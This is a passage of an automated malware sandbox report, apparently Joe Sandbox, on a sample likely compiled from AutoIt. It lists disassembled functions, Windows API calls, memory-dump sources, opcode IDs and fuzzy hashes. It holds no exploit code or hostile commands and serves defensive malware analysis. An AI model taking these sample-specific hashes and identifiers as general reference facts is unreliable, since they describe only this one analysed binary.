                                                                              • Instruction Fuzzy Hash: 49D05E3226050EAFEF018EA4DC01EAE3B69EB04B01F408521FE15D50A1C775E835AB60
                                                                              Function 0042A124 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0042A12A
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: ExceptionFilterUnhandled
                                                                              • String ID:
                                                                              • API String ID: 3192549508-0
                                                                              • Opcode ID: de316c34264f802ad97e41e2d96b97a4976e2443a0324b54249a0beeda03384a
                                                                              • Instruction ID: 5f0b767449e3d37fa0a9cb76ca1a1966b2bcebad2f74a673b8e7725f9ca30b43
                                                                              • Opcode Fuzzy Hash: de316c34264f802ad97e41e2d96b97a4976e2443a0324b54249a0beeda03384a
                                                                              • Instruction Fuzzy Hash: E2A0113000020CAB8A022B82EC08888BFACEA022A0B008030F80C808228B32A8208A88
                                                                              Function 02F4C7F0 Relevance: .9, Instructions: 853COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1454997766.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2f10000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: ed7182eb9ae2e6732c3596a466f7ffde814c0f34079fff4e886d216e401fce0b
                                                                              • Instruction ID: 17a025ec1ffd14eada62284fbb80bb2fd21ee9d2126a52aa64a5105ae3988379
                                                                              • Opcode Fuzzy Hash: ed7182eb9ae2e6732c3596a466f7ffde814c0f34079fff4e886d216e401fce0b
                                                                              • Instruction Fuzzy Hash: A2822E76B083108BD748DF19D89075EF7E2ABC8314F1A893DE999E3354DA74EC118B86
                                                                              Function 02F500D9 Relevance: .6, Instructions: 637COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1454997766.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2f10000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 59b4c6be9820cbba2c40dbb3f3d26c47f4c457eb4d5fc34305258bb9fa161a28
                                                                              • Instruction ID: 06102d5e436336c676c5e35f52b434f7f862452ee91466b7ab7f76202a665e71
                                                                              • Opcode Fuzzy Hash: 59b4c6be9820cbba2c40dbb3f3d26c47f4c457eb4d5fc34305258bb9fa161a28
                                                                              • Instruction Fuzzy Hash: 4C323122D69F154DD7239534C826336A248EFAB3D5F14DB3BED2AB5E96EF29C4834100
                                                                              Function 00418808 Relevance: .6, Instructions: 590COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: bc918cabfbc13eeeaccb278bb908b555cf4655f640fadc8373e86b06f087c2cb
                                                                              • Instruction ID: d3e05baf70842595a15b67714876080b4d37379fdc1224c105ba09137936e944
                                                                              • Opcode Fuzzy Hash: bc918cabfbc13eeeaccb278bb908b555cf4655f640fadc8373e86b06f087c2cb
                                                                              • Instruction Fuzzy Hash: 44223730904506CBDF288A68C4A47BEB7A1BF41345F28816FDD468B693DB7C9CD6C74A
                                                                              Function 004221C5 Relevance: .3, Instructions: 345COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                              • Instruction ID: 35e5cfd0643d00128ec34ecd890c43f992cb4d917009b55117061340238bc551
                                                                              • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                              • Instruction Fuzzy Hash: 18C1D83230507349DF2D4639953403FFAA15EA27B139A076FD8B3CB2D4EE18D965D624
                                                                              Function 02F151EE Relevance: .3, Instructions: 344COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1454997766.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2f10000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 55ecd314b4c5383ae3b665146288c950318f51326a4b3437a406d7ccc6c14070
                                                                              • Instruction ID: b482eb8992b34711a4f47a6f7f8ad86e6415eb31be13f23c85ffe824a0d63afc
                                                                              • Opcode Fuzzy Hash: 55ecd314b4c5383ae3b665146288c950318f51326a4b3437a406d7ccc6c14070
                                                                              • Instruction Fuzzy Hash: 7DD17F72A187818FC318DE5CC89165AFBE2EBD5300F488A3DE5D6D7785D674E809CB82
                                                                              Function 004225FA Relevance: .3, Instructions: 341COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                              • Instruction ID: 4494295b5c4546222a84ad3f443fcd2c01bced2acdb834a923f1c328fe2fc13d
                                                                              • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                              • Instruction Fuzzy Hash: CAC1D4333090B34ADF2D4639953403FBAA15EA27B139B036FD4B2DB2D4EE18D925D624
                                                                              Function 02F16EAF Relevance: .2, Instructions: 230COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1454997766.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2f10000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 9cf6abe3ae1924d79ced2347cf2a35a1b4fa91b2ca7a0e5006e3b059655bbd5e
                                                                              • Instruction ID: e9d80a0256e4011e2630863f8d515890e03dbb243ddb9c7c286eb62d2366eecb
                                                                              • Opcode Fuzzy Hash: 9cf6abe3ae1924d79ced2347cf2a35a1b4fa91b2ca7a0e5006e3b059655bbd5e
                                                                              • Instruction Fuzzy Hash: 3EA1A3B29093109FD344CF1AD88054BBBE2BFC8614F5AC96EF89897315D770E9458F8A
                                                                              Function 02F45980 Relevance: .2, Instructions: 188COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1454997766.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2f10000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 22795c9ed03d84af6dcafcb4bd33591edb2504b77a473f2716c7a4c8c56812e9
                                                                              • Instruction ID: ff6d5df8c18bcbe8fe2101f5cfd884a08bdb116bda97db56ce45bba43b3dbdc4
                                                                              • Opcode Fuzzy Hash: 22795c9ed03d84af6dcafcb4bd33591edb2504b77a473f2716c7a4c8c56812e9
                                                                              • Instruction Fuzzy Hash: 5A6160736197818FC32CCE2CC89145ABBE2EEA521474C8F6DD4D687792D670FA09C792
                                                                              Function 02F17F80 Relevance: .2, Instructions: 186COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1454997766.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2f10000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: e8d29d21587b575dc380072ea0b0f6c36b56ec1beeab86bfee52f3ca4c60ba64
                                                                              • Instruction ID: 6f01462ae6c2d954a41bcfc5807c00cc9a2db527f046e7f1aaa93a6dc0367920
                                                                              • Opcode Fuzzy Hash: e8d29d21587b575dc380072ea0b0f6c36b56ec1beeab86bfee52f3ca4c60ba64
                                                                              • Instruction Fuzzy Hash: EE61E3359287A84BD3169A39E85267AF394FFD63C4F54C73EEB8173A40DB2411268744
                                                                              Function 00574594 Relevance: .1, Instructions: 134COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: ab2fee5558319bb7b77599fdacabd9ee24db5531fb8add38223017fc8891590f
                                                                              • Instruction ID: 9b73fb6413c2de0e7a9154eaf4436e2265fe1c02b938a501d87519b57db06e1e
                                                                              • Opcode Fuzzy Hash: ab2fee5558319bb7b77599fdacabd9ee24db5531fb8add38223017fc8891590f
                                                                              • Instruction Fuzzy Hash: FF310A32A092845BCF328E587808AB57FA8BBA3775F1DC156E45C8B1A2D3219C44FE61
                                                                              Function 02F17B71 Relevance: .1, Instructions: 123COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1454997766.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2f10000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: ba4fd56b7d2ac45bfb91129d94ad6666f78c5595d5728fe56f0bdefbebfc0174
                                                                              • Instruction ID: 4fb3fd19513731da0d36763215fb0be7ee8aa40e035e5c98f8bd5e9e6619c9ad
                                                                              • Opcode Fuzzy Hash: ba4fd56b7d2ac45bfb91129d94ad6666f78c5595d5728fe56f0bdefbebfc0174
                                                                              • Instruction Fuzzy Hash: B041BE31A083558FD728EE29E8E067BB3D2FBC9385F65493ED78283280CB386415CB51
                                                                              Function 02F43780 Relevance: .1, Instructions: 105COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1454997766.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2f10000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: b33081dabc7f6469ce34c37c8165833aea82e5abc41e973800425e6ee7c24666
                                                                              • Instruction ID: 1f93681bd071c9b310666e60ae9e723361838b6add535ed4ccf0dafbb0d06587
                                                                              • Opcode Fuzzy Hash: b33081dabc7f6469ce34c37c8165833aea82e5abc41e973800425e6ee7c24666
                                                                              • Instruction Fuzzy Hash: 1E4170756183019F8348CF69C58091AFBE2BFCC318F25896EE8999B311D735E942CF92
                                                                              Function 02F4D580 Relevance: .1, Instructions: 100COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1454997766.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2f10000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: c76a15beeee963c4f84a445264956e8a3ca97236d94a4da0cbf7fb091b069d5c
                                                                              • Instruction ID: b5869b5d75bce0de78fe886a00a9b2f8a43124a0caffc1323e520ea091567c1b
                                                                              • Opcode Fuzzy Hash: c76a15beeee963c4f84a445264956e8a3ca97236d94a4da0cbf7fb091b069d5c
                                                                              • Instruction Fuzzy Hash: 4441AF456DE1C21EEB0B0B7190762E2EFF16CAF0487AEAAD9C0D80E203C503C587DB94
                                                                              Function 02F11130 Relevance: .0, Instructions: 2COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1454997766.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2f10000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                              • Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
                                                                              • Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                              • Instruction Fuzzy Hash:
                                                                              Function 0048356B Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CharUpperBuffW.USER32(?,?,0048F910), ref: 00483627
                                                                              • IsWindowVisible.USER32(?), ref: 0048364B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: BuffCharUpperVisibleWindow
                                                                              • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                              • API String ID: 4105515805-45149045
                                                                              • Opcode ID: df18ccac80ca4098b50a46d9e4b82a0c4588cfc9e14ecf85f4615084e1af2d64
                                                                              • Instruction ID: 9f5fdaa8788cae778637d634d7abea83d78ef325d3b9343814b8d9d38e530adb
                                                                              • Opcode Fuzzy Hash: df18ccac80ca4098b50a46d9e4b82a0c4588cfc9e14ecf85f4615084e1af2d64
                                                                              • Instruction Fuzzy Hash: 28D19E702042009BCA04FF11C451A6E77E5AF55759F54886EF8826B3A3DB3DEE0ACB5A
                                                                              Function 0048A5DA Relevance: 49.8, APIs: 33, Instructions: 260COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SetTextColor.GDI32(?,00000000), ref: 0048A630
                                                                              • GetSysColorBrush.USER32(0000000F), ref: 0048A661
                                                                              • GetSysColor.USER32(0000000F), ref: 0048A66D
                                                                              • SetBkColor.GDI32(?,000000FF), ref: 0048A687
                                                                              • SelectObject.GDI32(?,00000000), ref: 0048A696
                                                                              • InflateRect.USER32(?,000000FF,000000FF), ref: 0048A6C1
                                                                              • GetSysColor.USER32(00000010), ref: 0048A6C9
                                                                              • CreateSolidBrush.GDI32(00000000), ref: 0048A6D0
                                                                              • FrameRect.USER32(?,?,00000000), ref: 0048A6DF
                                                                              • DeleteObject.GDI32(00000000), ref: 0048A6E6
                                                                              • InflateRect.USER32(?,000000FE,000000FE), ref: 0048A731
                                                                              • FillRect.USER32(?,?,00000000), ref: 0048A763
                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 0048A78E
                                                                                • Part of subcall function 0048A8CA: GetSysColor.USER32(00000012), ref: 0048A903
                                                                                • Part of subcall function 0048A8CA: SetTextColor.GDI32(?,?), ref: 0048A907
                                                                                • Part of subcall function 0048A8CA: GetSysColorBrush.USER32(0000000F), ref: 0048A91D
                                                                                • Part of subcall function 0048A8CA: GetSysColor.USER32(0000000F), ref: 0048A928
                                                                                • Part of subcall function 0048A8CA: GetSysColor.USER32(00000011), ref: 0048A945
                                                                                • Part of subcall function 0048A8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0048A953
                                                                                • Part of subcall function 0048A8CA: SelectObject.GDI32(?,00000000), ref: 0048A964
                                                                                • Part of subcall function 0048A8CA: SetBkColor.GDI32(?,00000000), ref: 0048A96D
                                                                                • Part of subcall function 0048A8CA: SelectObject.GDI32(?,?), ref: 0048A97A
                                                                                • Part of subcall function 0048A8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 0048A999
                                                                                • Part of subcall function 0048A8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0048A9B0
                                                                                • Part of subcall function 0048A8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 0048A9C5
                                                                                • Part of subcall function 0048A8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0048A9ED
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                              • String ID:
                                                                              • API String ID: 3521893082-0
                                                                              • Opcode ID: a06d48a2979655432857ca0a86f3a9691512fcdd8cb1bcceda99ab6dc2c25faa
                                                                              • Instruction ID: fb34620bd59db4fe0d00bba54468f49f6ea6f7247eb536f08ce7ecc3d6e9d283
                                                                              • Opcode Fuzzy Hash: a06d48a2979655432857ca0a86f3a9691512fcdd8cb1bcceda99ab6dc2c25faa
                                                                              • Instruction Fuzzy Hash: 5E917D72408301BFD710AF64DC08A5F7BA9FB89321F100F2EF962961A1D774D949CB5A
                                                                              Function 00402C18 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 486windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • DestroyWindow.USER32(?,?,?), ref: 00402CA2
                                                                              • DeleteObject.GDI32(00000000), ref: 00402CE8
                                                                              • DeleteObject.GDI32(00000000), ref: 00402CF3
                                                                              • DestroyIcon.USER32(00000000,?,?,?), ref: 00402CFE
                                                                              • DestroyWindow.USER32(00000000,?,?,?), ref: 00402D09
                                                                              • SendMessageW.USER32(?,00001308,?,00000000), ref: 0043C43B
                                                                              • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0043C474
                                                                              • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0043C89D
                                                                                • Part of subcall function 00401B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00402036,?,00000000,?,?,?,?,004016CB,00000000,?), ref: 00401B9A
                                                                              • SendMessageW.USER32(?,00001053), ref: 0043C8DA
                                                                              • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0043C8F1
                                                                              • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0043C907
                                                                              • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0043C912
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                                              • String ID: 0
                                                                              • API String ID: 464785882-4108050209
                                                                              • Opcode ID: 4375e54c2866febaad8ffc9ac244cdd1ac029a08f3163fb11202e14e0822a081
                                                                              • Instruction ID: 2a922f2165ff82378a3b73503dcd1cf133edd61f128b8a365017e979e5fddc8b
                                                                              • Opcode Fuzzy Hash: 4375e54c2866febaad8ffc9ac244cdd1ac029a08f3163fb11202e14e0822a081
                                                                              • Instruction Fuzzy Hash: E112BF30604211EFDB15DF24C988BAAB7E1BF08304F54557EE855EB2A2C779E842CF99
                                                                              Function 004774AB Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • DestroyWindow.USER32(00000000), ref: 004774DE
                                                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0047759D
                                                                              • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 004775DB
                                                                              • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 004775ED
                                                                              • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00477633
                                                                              • GetClientRect.USER32(00000000,?), ref: 0047763F
                                                                              • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00477683
                                                                              • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00477692
                                                                              • GetStockObject.GDI32(00000011), ref: 004776A2
                                                                              • SelectObject.GDI32(00000000,00000000), ref: 004776A6
                                                                              • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 004776B6
                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004776BF
                                                                              • DeleteDC.GDI32(00000000), ref: 004776C8
                                                                              • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004776F4
                                                                              • SendMessageW.USER32(00000030,00000000,00000001), ref: 0047770B
                                                                              • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00477746
                                                                              • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 0047775A
